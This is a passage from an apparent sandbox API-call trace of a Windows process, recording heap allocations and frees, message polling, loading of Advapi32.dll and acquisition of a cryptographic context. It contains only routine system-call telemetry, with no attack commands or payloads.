0x2e78b28 [0225.370] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0225.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0225.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0225.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0225.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0225.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0225.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0225.370] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0225.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0225.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0225.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0225.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0225.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0225.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0225.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0225.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0225.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0225.371] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0225.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0225.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0225.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0225.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0225.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0225.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0225.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.371] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0225.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.372] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0225.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0225.372] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0225.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0225.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0225.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0225.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0225.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0225.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0225.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0225.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0225.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0225.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0225.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0225.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0225.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0225.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0225.372] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0225.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0225.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0225.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.373] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0225.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0225.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0225.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0225.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0225.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0225.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0225.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0225.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0225.373] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0225.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0225.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0225.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0225.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0225.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0225.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0225.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0225.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0225.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0225.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0225.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.374] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0225.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0225.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0225.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0225.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0225.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0225.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0225.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0225.374] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0225.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0225.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0225.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0225.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0225.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0225.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0225.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.375] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.375] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0225.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0225.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.375] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0225.375] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0225.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0225.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e699c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0225.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0225.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0225.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0225.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0225.376] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0225.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0225.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0225.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0225.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0225.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0225.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0225.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0225.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0225.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0225.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0225.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0225.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0225.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0225.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0225.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0225.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0225.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0225.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0225.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0225.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0225.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0225.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0225.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0225.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0225.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0225.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0225.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0225.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0225.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0225.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0225.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0225.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0225.380] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0225.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0225.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0225.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0225.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0225.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0225.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0225.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0225.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0225.381] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0225.381] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0225.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0225.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0225.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0225.381] 